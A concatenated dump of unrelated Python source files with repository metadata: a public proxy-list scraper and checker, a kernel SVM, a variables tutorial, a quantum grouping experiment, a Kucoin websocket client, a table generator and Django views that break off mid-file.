        self.get_proxy('https://www.us-proxy.org/')
        self.get_proxy('https://www.sslproxies.org/')
        self.get_proxy('http://spys.me/proxy.txt')
        self.unfiltered = list(set(self.unfiltered))  # drop duplicates across sources
        print('Total valid proxies>>>')
        print(len(self.unfiltered))
        time.sleep(3)

    def get_proxy(self, url):
        """Download *url* and append every "ip:port" found in it to ``unfiltered``."""
        pl = []
        try:
            res = requests.get(url)
            html = res.content.decode()
            try:
                # HTML table layout: <td>ip</td><td>port</td>
                pl = re.findall(r'<td>(\d+\.\d+\.\d+\.\d+)</td><td>(\d+)</td>', html)
                if not len(pl):
                    print('now collecting>>>')
                    time.sleep(1)
                    # plain-text layout: ip:port
                    pl = re.findall(r'(\d+\.\d+\.\d+\.\d+):(\d+)', html)
                # Bug fix: join the (ip, port) tuples for BOTH layouts.  The
                # original only joined the plain-text branch, so table-scraped
                # entries were stored as raw tuples and always failed the probe.
                try:
                    pl = [ip + ':' + port for ip, port in pl]
                except Exception:
                    print('no proxy found')
                self.unfiltered += pl
                print(pl)
            except Exception:
                print('line 40')
                print(len(self.unfiltered))
        except Exception as e:
            print('ERROR AT GET PROXY')
            print(str(e))

    def collect(self):
        """Probe every scraped proxy concurrently and report the survivor count."""
        with pool(max_workers=1000) as exc:
            exc.map(self.check_proxy, self.unfiltered)
        print(len(set(self.alive)))

    def check_proxy(self, x):
        """Try proxy "ip:port" up to three times; record it in ``alive`` on success."""
        for _ in range(3):
            try:
                proxies = {
                    'http': 'http://' + x,
                    'https': 'https://' + x,
                }
                r = requests.get('https://www.google.com/humans.txt',
                                 timeout=3,
                                 proxies=proxies)
                if r.status_code == 200:
                    print(x)
                    self.alive.append(x)
                    return
            except Exception:
                # Narrowed from a bare except so Ctrl-C still interrupts.
                pass
        print('dropping ' + x)
if __name__=='__main__':
    # Harvest, probe, and append the live proxies to fresh_proxy.txt.
    r = Prox()
    r.collect()
    with open('fresh_proxy.txt', 'a') as f:
        f.writelines(proxy + '\n' for proxy in r.alive)
27969273118 | import numpy as np
from scipy import optimize
class KernelSVC:
    """Kernel Support Vector Classifier trained by solving the dual QP with SLSQP.

    Labels are expected in {0, 1} and are mapped internally to {-1, +1}.
    ``predict`` returns a sigmoid score of the decision function (values above
    0.5 correspond to the positive class).
    """
    def __init__(self, C, kernel, epsilon=1e-3):
        self.type = 'non-linear'
        self.C = C                # box constraint / regularisation strength
        self.kernel = kernel      # kernel(X1, X2) -> Gram matrix
        self.alpha = None         # after fit: y_i * alpha_i dual coefficients
        self.support = None       # after fit: the training points
        self.epsilon = epsilon    # tolerance for detecting margin support vectors
        self.norm_f = None        # after fit: RKHS norm of the decision function
        self.Nfeval = 0           # SLSQP iteration counter (used by callbackF)
    def fit(self, X, y):
        """Solve the dual SVM problem on (X, y) and store alpha, b and norm_f."""
        y = 2 * (y - 0.5)  # map {0, 1} labels to {-1, +1}
        N = len(y)
        self.support = X
        M = self.kernel(X, X)  # Gram matrix, computed once
        # Lagrange dual problem
        def loss(alpha):
            # Negated dual objective: -sum(alpha) + 1/2 (Y a)' M (Y a)
            Y = np.diag(y)
            AY = Y @ alpha
            return -np.sum(alpha) + AY.T @ (M @ AY) / 2
        # Partial derivate of Ld on alpha
        def grad_loss(alpha):
            Y = np.diag(y)
            AY = Y @ alpha
            return -np.ones(len(alpha)) + Y @ (M @ AY)
        # Equality constraint sum(alpha * y) = 0 and box 0 <= alpha <= C,
        # the latter expressed as two inequality constraints for SLSQP.
        fun_eq = lambda alpha: np.sum(alpha * y)
        jac_eq = lambda alpha: y
        fun_ineq1 = lambda alpha: self.C - alpha
        jac_ineq1 = lambda alpha: -np.identity(len(alpha))
        fun_ineq2 = lambda alpha: alpha
        jac_ineq2 = lambda alpha: np.identity(len(alpha))
        constraints = ({'type': 'eq', 'fun': fun_eq, 'jac': jac_eq},
                       {'type': 'ineq', 'fun': fun_ineq1, 'jac': jac_ineq1},
                       {'type': 'ineq', 'fun': fun_ineq2, 'jac': jac_ineq2})
        optRes = optimize.minimize(fun=lambda alpha: loss(alpha),
                                   x0=np.ones(N),
                                   method='SLSQP',
                                   jac=lambda alpha: grad_loss(alpha),
                                   constraints=constraints,
                                   callback=self.callbackF,
                                   options={"maxiter":50, 'disp':True})
        self.alpha = optRes.x
        ## Assign the required attributes
        Y = np.diag(y)
        AY = Y @ self.alpha
        # Margin points: support vectors with epsilon < alpha < C - epsilon.
        self.margin_points = [X[p] for p in np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
        # Offset b averaged over the margin points (y_i - f(x_i) on the margin).
        self.b = np.mean(y[np.where((self.alpha > self.epsilon) & (self.alpha < self.C - self.epsilon))[0]]
                         - self.kernel(self.margin_points,X) @ AY)
        self.norm_f = np.sqrt(AY.T @ M @ AY)
        # Store y*alpha so separating_function is a single kernel mat-vec.
        self.alpha = AY
    ### Implementation of the separting function $f$
    def separating_function(self, x):
        """Decision function without offset: K(x, support) @ (y * alpha)."""
        return self.kernel(x, self.support) @ self.alpha
    def predict(self, X):
        """Return sigmoid(f(X) + b); values > 0.5 mean the positive class."""
        d = self.separating_function(X)
        # return 2 * (d + self.b > 0) - 1
        return 1 / (1 + np.exp(-(d+self.b)))
    def callbackF(self, Xi):
        """SLSQP per-iteration callback: print and advance the iteration counter."""
        print(self.Nfeval)
        self.Nfeval += 1
| Zero-4869/Kernel-methods | classifier.py | classifier.py | py | 2,631 | python | en | code | 0 | github-code | 36 |
7054738322 | """
变量其他写法
删除变量
练习:exercise04
"""
# Form 1: name = value
data01 = "悟空"
# print(data01)
# Form 2: name1, name2 = value1, value2  (parallel assignment)
data02, data03 = "八戒", "唐僧"
print(data02)  # "八戒"
print(data03)  # "唐僧"
# Form 3: name1 = name2 = value  (both names reference the same object)
data04 = data05 = "沙僧"
print(data05)
data01 = "大圣"  # rebinding: data01 now references a new string
print(data01)
del data02  # delete name data02; refcount of "八戒" drops to 0, object destroyed
del data04  # delete name data04; "沙僧" still referenced by data05 (refcount 1)
23666599352 | import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from GroupingAlgorithm import groupingWithOrder
from utils import Label2Chain, H2O, save_object
from joblib import delayed, Parallel
import networkx as nx
from itertools import permutations
from tqdm.auto import tqdm
import copy
sys.setrecursionlimit(10 ** 9)
def n_groups_shuffle(paulis, G, seed, shuffle_paulis=True, shuffle_qubits=True, x=1, n_max=10000, n_delete=0):
    """Randomly thin the connectivity graph, shuffle Pauli/qubit orders, then group.

    Returns ``(n_groups, order_paulis, order_qubits, G_new)``; ``n_groups`` is
    NaN when no connected thinned graph is found within the retry budget.

    NOTE(review): the qubit shuffle below writes the permuted columns back into
    ``paulis`` in place, mutating the caller's array — confirm this is intended.
    NOTE(review): edge deletion uses ``np.random.default_rng()`` *before*
    ``np.random.seed(seed)`` is applied, so the thinning step is not
    reproducible from ``seed``.
    """
    G_new = copy.deepcopy(G)
    if x < 1 or n_delete > 0:
        edges = list(G_new.edges())
        if x < 1:
            # Delete a (1 - x) fraction of the edges.
            n_delete = int((1 - x) * len(edges))
        indices_delete = np.random.default_rng().choice(len(edges), size=n_delete, replace=False)
        for index in indices_delete:
            G_new.remove_edge(*edges[index])
        if not nx.is_connected(G_new):
            # Thinning disconnected the graph: retry with the same deletion
            # count (up to n_max more times), or give up with NaN.
            if n_max == 0:
                return np.nan, None, None, G_new
            else:
                return n_groups_shuffle(paulis, G, seed, shuffle_paulis=shuffle_paulis,
                                        shuffle_qubits=shuffle_qubits, x=x, n_max=n_max - 1, n_delete=n_delete)
    np.random.seed(seed)
    order_paulis = np.arange(len(paulis))
    # NOTE(review): relies on the module-level ``num_qubits`` global rather
    # than paulis.shape[1].
    order_qubits = np.arange(num_qubits)
    if shuffle_paulis:
        np.random.shuffle(order_paulis)
    if shuffle_qubits:
        np.random.shuffle(order_qubits)
    # Apply the qubit permutation column by column (in place, see note above).
    temp = copy.deepcopy(paulis)
    for j in range(len(order_qubits)):
        paulis[:, j] = temp[:, order_qubits[j]]
    Groups_HEEM, _, _ = groupingWithOrder(paulis[order_paulis], G_new)
    return len(Groups_HEEM), order_paulis, order_qubits, G_new
qubit_op = H2O()
num_qubits = qubit_op.num_qubits
paulis, _, _ = Label2Chain(qubit_op)
print('There are {} Pauli strings of {} qubits.'.format(len(qubit_op), num_qubits))
WC_ideal = list(permutations(list(range(num_qubits)), 2))
G_ideal = nx.Graph()
G_ideal.add_nodes_from(range(num_qubits))
G_ideal.add_edges_from(WC_ideal)
backend_parallel = 'multiprocessing'
n = num_qubits
k = 2
total_edges = int(np.math.factorial(n) / (np.math.factorial(n - k) * 2))
n_x = 20
N = 3000
x_vec = np.linspace((num_qubits - 1) / total_edges, 1, n_x)
n_groups_list = []
optimal_order_paulis = []
optimal_order_qubits = []
optimal_graph = []
pbar_outer = tqdm(range(n_x), desc='Connectivity', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=0)
for i in pbar_outer:
pbar_inner = tqdm(range(N), desc='Shuffling', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=1)
results = Parallel(n_jobs=-1, backend=backend_parallel)(
delayed(n_groups_shuffle)(paulis, G_ideal, None, x=x_vec[i]) for j in
pbar_inner)
print('-' * 90)
n_groups = [results[i][0] for i in range(N)]
delete_indices = np.where(np.isnan(n_groups))[0]
for j, index in enumerate(delete_indices):
n_groups.pop(index - j)
results.pop(index - j)
n_groups_list.append(n_groups)
index_min = np.argmin(n_groups)
optimal_order_paulis.append(results[index_min][1])
optimal_order_qubits.append(results[index_min][2])
optimal_graph.append(results[index_min][3])
n_std = np.zeros(n_x)
n_avg = np.zeros(n_x)
n_min = np.zeros(n_x)
n_max = np.zeros(n_x)
for i in range(n_x):
n_std[i] = np.std(n_groups_list[i])
n_avg[i] = np.mean(n_groups_list[i])
n_min[i] = np.min(n_groups_list[i])
n_max[i] = np.max(n_groups_list[i])
fig, ax = plt.subplots()
ax.plot(x_vec, n_avg)
ax.fill_between(x_vec, n_avg - n_std, n_avg + n_std, alpha=0.25)
ax.plot(x_vec, n_min, '--')
ax.plot(x_vec, n_max, '--')
ax.set_xlabel('x')
ax.set_ylabel('# of groups')
ax.set_xlim([x_vec[0], x_vec[-1]])
fig.show()
file = 'H20_grouping_shuffle_ideal_vs_connectivity'
data_save = {'x_vec': x_vec, 'n_groups': n_groups_list, 'optimal_order_paulis': optimal_order_paulis,
'optimal_order_qubits': optimal_order_qubits, 'optimal_graph': optimal_graph}
save_object(data_save, file, overwrite=True)
| sergiomtzlosa/HEEM | Codes/deprecated/Grouping_shuffle_vs_connectivity.py | Grouping_shuffle_vs_connectivity.py | py | 3,807 | python | en | code | null | github-code | 36 |
24199168182 | import asyncio
import logging
import random
from enum import Enum
from uuid import uuid4
import websockets
from wired_exchange.kucoin import CandleStickResolution
from typing import Union
WS_OPEN_TIMEOUT = 10
WS_CONNECTION_TIMEOUT = 3
class WebSocketState(Enum):
    """Lifecycle states of the websocket client wrapper."""
    STATE_WS_READY = 1    # idle / able to (re)connect
    STATE_WS_CLOSING = 2  # close() requested; loops should exit
class WebSocketNotification(Enum):
    """Out-of-band events broadcast to every registered message handler."""
    CONNECTION_LOST = 1  # underlying websocket connection dropped
class WebSocketMessageHandler:
    """Interface for objects that inspect raw inbound websocket messages."""
    def can_handle(self, message: str) -> bool:
        """Return True when this handler wants to process *message*."""
        pass
    def handle(self, message: str) -> bool:
        """Process the received message and indicate whether the handler must stay
        registered; one-time handlers are useful when waiting for an acknowledgement."""
        pass
    def on_notification(self, notification: WebSocketNotification):
        """React to out-of-band events (e.g. connection loss); default is a no-op."""
        pass
class KucoinWebSocket:
    """Async Kucoin websocket client with a chain of pluggable message handlers.

    Inbound frames are offered to the registered WebSocketMessageHandler
    objects in order; the first whose ``can_handle`` returns True consumes
    the frame.
    """
    def __init__(self, endpoint, token, encrypt: bool,
                 ping_interval: int, ping_timeout: int, connect_id: str = None):
        """Store connection parameters; ping values are in milliseconds (Kucoin).

        NOTE(review): PongMessageHandler schedules an asyncio task in its
        constructor, so this object must be created with a running event loop.
        """
        self._encrypt = encrypt
        self._ping_timeout = ping_timeout
        self._ping_interval = ping_interval
        self._endpoint = endpoint
        self._token = token
        # Kucoin requires a connectId; default to a dashless UUID4.
        self._id = connect_id if connect_id is not None else str(uuid4()).replace('-', '')
        self._logger = logging.getLogger(type(self).__name__)
        self._ws = None
        self._connected = asyncio.Event()
        # Handler chain, consulted in order: pong bookkeeping, welcome ack, catch-all sink.
        self._handlers = [PongMessageHandler(self, self._ping_interval, self._ping_timeout),
                          self.WelcomeMessageHandler(self._connected), SinkMessageHandler()]
        self._state: WebSocketState = WebSocketState.STATE_WS_READY
    async def open_async(self):
        """Connect and process messages until close() is called.

        ``websockets.connect`` used as an async iterator reconnects
        automatically after a dropped connection.
        """
        uri = f"{self._endpoint}?token={self._token}&connectId={self._id}"
        try:
            if self._state != WebSocketState.STATE_WS_READY:
                return
            async for ws in websockets.connect(uri,
                                               logger=self._logger,
                                               ssl=self._encrypt,
                                               open_timeout=WS_OPEN_TIMEOUT,
                                               ping_interval=self._ping_interval,
                                               ping_timeout=self._ping_timeout):
                try:
                    if self._state == WebSocketState.STATE_WS_CLOSING:
                        break
                    self._ws = ws
                    # Fresh (re)connection: clear the connected flag until the
                    # server's welcome frame is seen again.
                    self._disconnect()
                    await self._run_message_loop(ws)
                except websockets.ConnectionClosed:
                    continue
        finally:
            # Tell every handler the connection is gone and reset state so the
            # socket can be reopened later.
            for handler in self._handlers:
                handler.on_notification(WebSocketNotification.CONNECTION_LOST)
            self._disconnect()
            self._ws = None
            self._state = WebSocketState.STATE_WS_READY
    async def _run_message_loop(self, ws: websockets):
        """Dispatch every inbound frame until the socket closes or we shut down."""
        async for message in ws:
            try:
                if self._state == WebSocketState.STATE_WS_CLOSING:
                    break
                self._handle_message(message)
            except:  # noqa: E722 - keep the loop alive whatever a handler raises
                self._logger.error(f'something goes wrong when processing message: {message}', exc_info=True)
    def insert_handler(self, handler: WebSocketMessageHandler):
        """Register *handler* with the highest priority (front of the chain)."""
        self._handlers.insert(0, handler)
        self._logger.debug(f'{type(handler).__name__}: handler registered')
    def _handle_message(self, message):
        # First matching handler wins. NOTE(review): the handler's boolean
        # "keep me registered" return value is ignored here, so one-time
        # handlers are never actually removed from the chain.
        for handler in self._handlers:
            if handler.can_handle(message):
                self._logger.debug(f'handler found: {type(handler).__name__}')
                handler.handle(message)
                return
    async def subscribe_klines_async(self, topics: list[tuple[str, str, CandleStickResolution]]):
        """Subscribe to candlestick topics given as (base, quote, resolution) triples."""
        try:
            await self.wait_connection_async()
            subscription_id = random.randint(100000000, 1000000000)
            # Watch for the server's ack of this subscription id.
            self.insert_handler(SubscriptionHandler(subscription_id))
            await self._ws.send(self._new_klines_subscription_message(subscription_id, topics))
            self._logger.debug('kline subscription completed')
        except TimeoutError:
            self._logger.error('kline subscription timeout', exc_info=True)
    async def subscribe_tickers_async(self, tickers: Union[list[tuple[str, str]], None]):
        """Subscribe to ticker topics; ``None`` subscribes to all tickers."""
        try:
            await self.wait_connection_async()
            subscription_id = random.randint(100000000, 1000000000)
            self.insert_handler(SubscriptionHandler(subscription_id))
            await self._ws.send(self._new_tickers_subscription_message(subscription_id, tickers))
            self._logger.debug('ticker subscription completed')
        except TimeoutError:
            self._logger.error('ticker subscription timeout', exc_info=True)
    def _new_tickers_subscription_message(self, subscription_id: int,
                                          tickers: Union[list[tuple[str, str]], None]):
        # Build the JSON subscribe frame; topic is ":all" or a comma-separated
        # BASE-QUOTE list.
        if tickers is None:
            return f"""
            {{
            "id": {subscription_id},
            "type": "subscribe",
            "topic": "/market/ticker:all",
            "response": true
            }}
            """
        else:
            return f"""
            {{
            "id": {subscription_id},
            "type": "subscribe",
            "topic": "/market/ticker:{','.join([f'{bc}-{qc}' for bc, qc in tickers])}",
            "response": true
            }}
            """
    def _new_klines_subscription_message(self, subscription_id: int,
                                         topics: list[tuple[str, str, CandleStickResolution]]):
        # Candle topic format: BASE-QUOTE_resolution, comma-separated.
        return f"""
        {{
        "id": {subscription_id},
        "type": "subscribe",
        "topic": "/market/candles:{','.join([f'{bc}-{qc}_{res.value}' for bc, qc, res in topics])}",
        "response": true
        }}
        """
    def _disconnect(self):
        """Clear the connected flag (fluent: returns self)."""
        self._connected.clear()
        return self
    def is_connected(self):
        # NOTE(review): missing ``return`` -- this always yields None; use
        # wait_connection_async() or inspect the event directly.
        self._connected.is_set()
    def wait_connection_async(self, timeout: int = WS_CONNECTION_TIMEOUT):
        """Awaitable that resolves once the server's welcome frame has arrived."""
        return asyncio.wait_for(self._connected.wait(), timeout)
    def close(self):
        """Ask the connection/message loops to exit at their next check point."""
        self._state = WebSocketState.STATE_WS_CLOSING
    async def send(self, message):
        """Send *message* once the connection has been acknowledged."""
        await self.wait_connection_async()
        await self._ws.send(message)
    class WelcomeMessageHandler(WebSocketMessageHandler):
        """Flips the shared connected event when the welcome frame arrives."""
        def __init__(self, event: asyncio.Event):
            self._connected = event
            self._logger = logging.getLogger(type(self).__name__)
        def can_handle(self, message):
            return not self._connected.is_set() and '"type":"welcome"' in message
        def handle(self, message):
            self._connected.set()
            self._logger.debug('connection acknowledged by server')
            return True
class PongMessageHandler(WebSocketMessageHandler):
    """Keeps the Kucoin session alive with application-level ping/pong frames.

    NOTE(review): the ping task is created in ``__init__`` via
    ``asyncio.create_task``, which raises unless an event loop is running.
    """
    def __init__(self, ws: KucoinWebSocket, ping_interval: int, ping_timeout: int):
        self._ws = ws
        # Kucoin supplies intervals in ms; convert to seconds and ping slightly
        # early (95% of the interval) to stay within the server's deadline.
        self._ping_interval = ping_interval / 1000 * .95
        self._ping_timeout = ping_timeout / 1000
        self._task = asyncio.create_task(self._loop())
        self._task.set_name('ping_pong')
        self._pong = asyncio.Event()
        self._logger = logging.getLogger(type(self).__name__)
    async def _loop(self):
        """Ping, wait for the matching pong, sleep, repeat until cancelled."""
        while True:
            try:
                await self._send_ping_message()
                # NOTE(review): on Python < 3.11 asyncio.wait_for raises
                # asyncio.TimeoutError, which this builtin TimeoutError clause
                # would not catch -- confirm the target interpreter version.
                await asyncio.wait_for(self._pong.wait(), self._ping_timeout)
                self._pong.clear()
                await asyncio.sleep(self._ping_interval)
            except TimeoutError:
                self._logger.warning('ping timeout reached without pong')
                continue
            except asyncio.CancelledError:
                self._logger.warning('ping handler stopped')
                break
    def can_handle(self, message):
        return f'"type":"pong"' in message
    def handle(self, message):
        # Release the waiter in _loop.
        self._pong.set()
        return True
    def on_notification(self, notification: WebSocketNotification):
        """Stop pinging once the connection is gone."""
        if notification == WebSocketNotification.CONNECTION_LOST:
            self._task.cancel()
    def _send_ping_message(self):
        # Returns the send coroutine; awaited by the caller in _loop.
        message_id = random.randint(100000000, 1000000000)
        return self._ws.send(f'{{ "id":{message_id},"type":"ping" }}')
class SinkMessageHandler(WebSocketMessageHandler):
    """Catch-all terminal handler: logs any message nobody else claimed."""
    def __init__(self):
        self._logger = logging.getLogger(type(self).__name__)
    def can_handle(self, message):
        # Always true -- keep this handler last in the chain.
        return True
    def handle(self, message):
        self._logger.debug(f'unhandled message received: {message}')
        return True
class SubscriptionHandler(WebSocketMessageHandler):
    """Waits for the ack of one subscription request, matched by its id."""
    def __init__(self, subscription_id: int):
        self.subscription_id = subscription_id
        self._logger = logging.getLogger(type(self).__name__)
    def can_handle(self, message: str) -> bool:
        return f'"id":{self.subscription_id}' in message
    def handle(self, message: str) -> bool:
        """Log the ack (or an unexpected reply); False signals one-time use."""
        if '"type":"ack"' in message:
            self._logger.info(f'subscription #{self.subscription_id} acknowledged')
        else:
            self._logger.warning(f'subscription #{self.subscription_id}: unexpected response: {message}')
        return False
class StrategyHandler(WebSocketMessageHandler):
    """Placeholder for strategy-specific message handling; not implemented yet."""
    pass
| WiredSharp/wiredExchange | wired_exchange/kucoin/WebSocket.py | WebSocket.py | py | 9,314 | python | en | code | 0 | github-code | 36 |
2791908838 | import pandas as pd
import numpy as np
table = pd.read_excel("TABLE1_updated.xlsx")
table.to_html('finalTable.html')
table.to_json('finalTable.json',orient='records')
# Filtrar por major_grouping_variable
# Agrupar por artigo
# Juntar códigos
ds = pd.read_excel("table_generator/finalTable.xlsx")
majors = table.major_grouping_variable.unique()
articles = table.article.unique()
table = pd.DataFrame(
columns = articles,
index = majors
)
def format_code_list(codes):
    """Join the elements of *codes* into one comma-separated string.

    Works for any iterable (pandas Series, list, tuple, ...), not only objects
    exposing ``.iloc`` as the original did; an empty input yields ''.
    """
    # str.join is linear-time and side-steps both the quadratic ``+=`` build
    # and the pandas-only ``.iloc[-1]`` access (which crashed on empty input).
    return ", ".join(str(code) for code in codes)
article = articles[10]
major = majors[6]
codes = ds[(ds.major_grouping_variable == major) & (ds.article == article)].code
for major in majors:
print(major)
for article in articles:
codes = ds[(ds.major_grouping_variable == major) & (ds.article == article)].code
print(article)
if (len(codes) > 0):
formatted_codes = format_code_list (codes)
table.at[major, article] = formatted_codes
else:
table.at[major, article] = "-"
table["Unnamed: 0"] = table["Unnamed: 0"].apply(lambda row: "<strong>"+str(row)+"</strong>")
table.to_html('Table1FINAL.html', escape = False)
table.to_csv('Table1FINAL.csv')
| marianacpais/RS_ambulatory_conditions | table_generator/main.py | main.py | py | 1,363 | python | en | code | 0 | github-code | 36 |
42117172102 | from gpiozero import Button, PWMLED, MotionSensor
from time import sleep, time
from signal import pause
from datetime import datetime, timedelta
import simpleaudio as sa
from models import Game, Goal, Team
from game_history import send_game_history
from constants import UI_GAME_CLOCK, UI_TEAM1_SCORE, UI_TEAM2_SCORE
import threading
import queue
def _play_sound_clip(sound_file, wait=False):
    """Play a WAV file via simpleaudio; block until playback ends when *wait* is True."""
    wave_obj = sa.WaveObject.from_wave_file(sound_file)
    play_obj = wave_obj.play()
    if wait:
        play_obj.wait_done()
def _get_elapsed_time_string(elapsed_seconds):
hours, rem = divmod(elapsed_seconds, 3600)
minutes, seconds = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:0>2}".format(int(hours), int(minutes), int(seconds))
def _team_scored(team):
    """Goal-scored callback: play the goal jingle (the *team* argument is unused)."""
    _play_sound_clip("/home/pi/Projects/FoosTracks/resources/SoccerGoal.wav")
class AsyncMatch(threading.Thread):
    def __init__(self, ui_queue,
                 team1_name, team1_members,
                 team2_name, team2_members,
                 games_per_match=1,
                 points_to_win=5,
                 next_game_callback=None,
                 match_end_callback=None):
        """Configure a best-of-``games_per_match`` match between two teams."""
        super().__init__()
        self.ui_queue = ui_queue # queue for asynchronous updates to the tkinter UI
        self.team1_name = team1_name
        self.team2_name = team2_name
        self.team1_members = team1_members
        self.team2_members = team2_members
        self.games_per_match = games_per_match
        self.points_to_win = points_to_win
        self.next_game_callback = next_game_callback # no-arg callable -> bool: True to play the next game, False to end the match
        self.match_end_callback = match_end_callback # no-arg callable notifying the UI that the match has ended
        self.cancelled = False
        self.devices = []
    def cancel(self):
        """Request that the match loop stop at its next check point."""
        self.cancelled = True
    def run(self):
        """Thread entry point: play the match unless it was cancelled beforehand."""
        if not self.cancelled:
            self._start_match()
    def _start_match(self):
        """Create teams and GPIO goal sensors, then play up to games_per_match games.

        Teams swap physical goals every other game so any sensor bias evens out.
        """
        print("Starting match ...")
        team1 = Team(name=self.team1_name, members=self.team1_members, score_handler=_team_scored)
        team2 = Team(name=self.team2_name, members=self.team2_members, score_handler=_team_scored)
        # Goal sensors on GPIO pins 16 and 19.
        dev = MotionSensor(16, pull_up=True, sample_rate=120, queue_len=1)
        goal_a = Goal(name="Goal A",
                      score_device=dev,
                      score_handler=None)
        dev = MotionSensor(19, pull_up=True, sample_rate=120, queue_len=1)
        goal_b = Goal(name="Goal B",
                      score_device=dev,
                      score_handler=None)
        # Keep the raw devices so _clean_up can release the GPIO pins.
        self.devices = [goal_a.input_device, goal_b.input_device]
        games_played = 0
        while games_played < self.games_per_match:
            # Alternate goal/team pairing each game.
            if games_played % 2 == 0:
                last_game = self._start_new_game(team1, goal_a, team2, goal_b, ui_queue=self.ui_queue)
            else:
                last_game = self._start_new_game(team1, goal_b, team2, goal_a, ui_queue=self.ui_queue)
            if self.cancelled:
                self._clean_up()
                print("Match was cancelled")
                return
            # Game has finished check if the next game in the match should be played
            games_played += 1
            if games_played < self.games_per_match:
                if not self._play_next_game(last_game):
                    self._clean_up()
                    if self.match_end_callback:
                        self.match_end_callback()
                    break
            else:
                # Match is over
                if self.match_end_callback:
                    self.match_end_callback()
                print("Match is over hope you had fun!")
    def _start_new_game(self, team1, goal_1, team2, goal_2, sound_fx=True, ui_queue=None):
        """Run one game to completion and return the Game (None when cancelled)."""
        print("Starting new game ...")
        # Route each goal's score events to the corresponding team callback.
        goal_1.set_on_score_handler(team1.did_score)
        goal_2.set_on_score_handler(team2.did_score)
        game = Game(team1=team1, team2=team2)
        game.start()
        if sound_fx:
            self._start_fx()
        start_time = time()
        # Poll at 10 Hz until a team reaches points_to_win (see _check_game).
        while not game.finished:
            if self.cancelled:
                print("Game was cancelled")
                self._clean_up()
                return
            self._update_ui(ui_queue, start_time, game)
            self._check_game(game)
            sleep(0.1)
        # Game is finished
        self._report_game_stats(game)
        return game
    def _start_fx(self):
        """Start the crowd-noise background clip (fire and forget)."""
        sound_file = "/home/pi/Projects/FoosTracks/resources/SoccerCrowd.wav"
        wave_obj = sa.WaveObject.from_wave_file(sound_file)
        play_obj = wave_obj.play()
    def _stop_fx(self):
        """Silence all simpleaudio playback."""
        sa.stop_all()
    def _update_ui(self, ui_queue, start_time, game):
        """Push the game clock and both scores onto the UI queue, if one is set."""
        elapsed_time = _get_elapsed_time_string(time() - start_time)
        team1_score = game.team1.total_score()
        team2_score = game.team2.total_score()
        if ui_queue:
            ui_msg = {
                UI_GAME_CLOCK: elapsed_time,
                UI_TEAM1_SCORE: team1_score,
                UI_TEAM2_SCORE: team2_score
            }
            ui_queue.put(ui_msg)
    def _check_game(self, game):
        """Mark the game finished once either team reaches points_to_win."""
        # Both teams at/over the threshold should be impossible with 10 Hz polling.
        if game.team1.total_score() >= self.points_to_win and game.team2.total_score() >= self.points_to_win:
            assert False, "NOT POSSIBLE FOR BOTH TEAMS TO WIN"
        elif game.team1.total_score() >= self.points_to_win:
            game.finish()
        elif game.team2.total_score() >= self.points_to_win:
            game.finish()
    def _clean_up(self):
        """Stop audio playback and release the GPIO sensor devices."""
        sa.stop_all()
        # unset goal score handlers
        for d in self.devices:
            d.close()
    def _report_game_stats(self, game):
        """Upload the finished game's history and announce the winner."""
        winner = game.get_winning_team()
        loser = game.get_losing_team()
        send_game_history(game)
        self._print_win_message(winning_team=winner, losing_team=loser)
    def _print_win_message(self, winning_team, losing_team):
        """Print the winner announcement and final score to the console."""
        msg = "\n{0} has won!!!\n{0} - {1}, {2} - {3}".format(winning_team.name,
                                                             winning_team.total_score(),
                                                             losing_team.name,
                                                             losing_team.total_score())
        print(msg)
def _play_next_game(self, last_game):
if self.next_game_callback:
winner = last_game.get_winning_team()
loser = last_game.get_losing_team()
msg = "{0} won!\n\nScore\n {0} - {1}\n {2} - {3}\n\nPlay next game?".format(winner.name, winner.total_score(), loser.name, loser.total_score())
play_next = self.next_game_callback(message=msg, title="")
return play_next
else:
input("Press enter to play next game ...")
return True | hobe-studios/foos-tracks | rasppi/score_keeper.py | score_keeper.py | py | 7,000 | python | en | code | 0 | github-code | 36 |
19682706596 | import datetime
import json
import requests
from apps.findprice.models import Product, CATEGORY_CHOICES, Scan, User
from apps.findprice.serializers import ProductSerializer, ScanSerializer, ProductsCatSerializer, \
ScansForProductSerializer
from django.contrib.auth.forms import SetPasswordForm
from django.http import JsonResponse
from django.shortcuts import render
from rest_framework import viewsets
class ProductViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoint over all Product rows."""
    serializer_class = ProductSerializer
    queryset = Product.objects.all()
class ScanViewSet(viewsets.ModelViewSet):
    """Full CRUD REST endpoint over all Scan rows."""
    serializer_class = ScanSerializer
    queryset = Scan.objects.all()
def getCategory(request):
    """Return all categories as JSON: [{"id": i, "category": name}, ...].

    Only answers GET; any other method falls through and returns None
    (matching the original behavior).
    """
    if request.method == 'GET':
        # Build the payload directly with enumerate instead of filling two
        # parallel lists and zipping them; also avoids shadowing builtin ``id``.
        categories = [{"id": i, "category": choice[0]}
                      for i, choice in enumerate(CATEGORY_CHOICES)]
        return JsonResponse(categories, safe=False)
class getProductsSet(viewsets.ModelViewSet):
    """Product endpoint filterable via ?cat=<category>&id=<pk> query params."""
    # queryset = Product.objects.all()
    serializer_class = ProductsCatSerializer
    def get_queryset(self):
        """Apply the optional 'cat' and 'id' query-string filters to all products."""
        queryset = Product.objects.all()
        category = self.request.query_params.get('cat')
        id = self.request.query_params.get('id')  # NOTE: shadows builtin id()
        if category is not None:
            queryset = queryset.filter(category=category)
        if id is not None:
            queryset = queryset.filter(id=id)
        return queryset
class getProductScan(viewsets.ModelViewSet):
    """Scans near a location, optionally restricted to one product.

    Expects a JSON 'filter' query param with keys "lat", "long", "id", "dt";
    id == '*' means any product.
    """
    serializer_class = ScansForProductSerializer
    def get_queryset(self):
        queryset = Scan.objects.all()
        filter = self.request.query_params.get('filter')  # NOTE: shadows builtin filter()
        if filter is not None:
            filter = json.loads(filter)
            lat = filter['lat']
            long = filter['long']
            id = filter['id']
            dt = filter['dt']
            if(id== '*'):
                print(id)  # NOTE(review): leftover debug print
                # Any product: scans within +/-0.5 degrees, in the 7 days before dt.
                pdt = datetime.datetime.strptime(dt, "%Y-%m-%dT%H:%M:%S.%fZ") - datetime.timedelta(days=7)
                queryset = queryset.filter(lat__lte=float(lat) + 0.5, lat__gte=float(lat) - 0.5,
